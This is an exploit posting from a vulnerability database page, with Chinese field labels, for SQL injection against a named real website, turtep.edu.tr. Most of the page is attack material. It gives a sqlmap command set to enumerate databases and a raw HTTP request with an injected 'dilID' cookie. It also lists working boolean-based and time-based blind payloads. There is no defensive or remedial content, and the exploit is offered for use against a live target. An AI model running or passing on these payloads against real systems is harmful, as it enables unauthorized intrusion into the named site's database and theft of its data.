turtep SQL İnjection - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1849636 漏洞类型
发布时间 2019-12-06 更新时间 2019-12-06
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019120025
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Exploit Title:turtep.edu.tr SQL İnjection 
# Date:5.12.2019
# Exploit Author: Furkan Özer // Prototyqe
# Vendor Homepage: turtep.edu.tr
# Version: ALL 
# Tested on: Windows 10-Linux Kali


c:\sqlmap\sqlmap.py -r c:\sqlmap\attack.txt --random-agent --level=3 --risk=3 --technique=BUSETQ --tamper=randomcase --timeout=10 --retries=20 --no-cast --dbs


SQL'Lİ
----------------------------
GET /index.php HTTP/1.1
Cookie: dilID=-1 or 42 %3D 40
X-Requested-With: XMLHttpRequest
Host: www.turtep.edu.tr
Accept: */*



parameter: dilID (Cookie)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: dilID=-1 or 42 = 40 OR NOT 4991=4991

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: dilID=-1 or 42 = 40 AND (SELECT 3915 FROM (SELECT(SLEEP(5)))STVi)